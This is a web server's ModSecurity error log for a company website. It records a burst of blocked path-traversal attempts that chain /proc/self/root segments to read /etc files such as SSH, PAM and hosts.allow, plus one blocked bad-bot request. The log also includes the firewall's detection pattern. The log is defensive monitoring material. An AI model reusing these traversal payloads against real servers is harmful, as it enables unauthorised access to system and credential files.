[Tue Mar 17 12:07:29.076859 2026] [:error] [pid 2598:tid 140411582465792] [client 74.7.243.203:34156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluMRj0p0SRWAqcjGFugwAAAxM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:07:32.907422 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.241.46:60370] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluNAeiSKl8TjouI-YP-wAAA9E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:35.622855 2026] [:error] [pid 19507:tid 140411699963648] [client 74.7.241.46:60120] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluN9Y0UrI5A3LftIzwmwAAAYU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:37.122942 2026] [:error] [pid 18380:tid 140411641214720] [client 74.7.241.46:60126] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluOK4xEDsg_V3ESNZApgAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:40.776736 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.241.46:50306] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluO7-sgTmmJoPuMdysZAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:42.089259 2026] [:error] [pid 2598:tid 140411658000128] [client 74.7.241.46:50318] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluPhj0p0SRWAqcjGFujgAAAwo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:48.901777 2026] [:error] [pid 2473:tid 140411716749056] [client 74.7.228.16:47560] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abluRKBJNF7axNlVR0UKtAAAAAM"]
[Tue Mar 17 12:07:55.191743 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.243.203:55568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluS6BJNF7axNlVR0UKvwAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:07:56.480953 2026] [:error] [pid 18380:tid 140411666392832] [client 74.7.243.203:39694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluTK4xEDsg_V3ESNZAtwAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:08:03.718251 2026] [:error] [pid 9299:tid 140411691570944] [client 74.7.243.203:39704] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluU7-sgTmmJoPuMdysgAAAAsY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:08:05.003645 2026] [:error] [pid 9299:tid 140411658000128] [client 74.7.241.46:50334] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluVb-sgTmmJoPuMdysggAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:02.303425 2026] [:error] [pid 2160:tid 140411674785536] [client 74.7.241.46:46130] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablujjjrdei6i7MVRTDSGAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:08.249064 2026] [:error] [pid 11293:tid 140411666392832] [client 74.7.241.46:51780] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablulNCmCSWTlPouqorZ8QAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:09.541830 2026] [:error] [pid 2160:tid 140411607643904] [client 74.7.241.46:55602] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablulTjrdei6i7MVRTDSGQAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:12.028732 2026] [:error] [pid 18380:tid 140411649607424] [client 74.7.241.46:55616] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablumK4xEDsg_V3ESNZA4wAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:14.637033 2026] [:error] [pid 17965:tid 140411658000128] [client 74.7.241.46:55622] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablumat8Nd0UC_OcbVG-xQAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:15.982597 2026] [:error] [pid 7437:tid 140411607643904] [client 74.7.241.46:55634] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablumweiSKl8TjouI-YQWgAAA9A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:16.961922 2026] [:error] [pid 7437:tid 140411557287680] [client 74.7.243.203:52356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablunAeiSKl8TjouI-YQXAAAA9Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:09:17.398741 2026] [:error] [pid 9299:tid 140411548894976] [client 74.7.241.46:55638] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablunb-sgTmmJoPuMdysnAAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:09:18.309934 2026] [:error] [pid 9155:tid 140411607643904] [client 74.7.243.203:54720] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/hosts.allow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluntbI7zhHXcabyMU0oQAAAlA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:09:19.480532 2026] [:error] [pid 9155:tid 140411632822016] [client 74.7.243.203:54728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablun9bI7zhHXcabyMU0pAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:09:20.820914 2026] [:error] [pid 9299:tid 140411565680384] [client 74.7.243.203:34786] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abluoL-sgTmmJoPuMdysnQAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
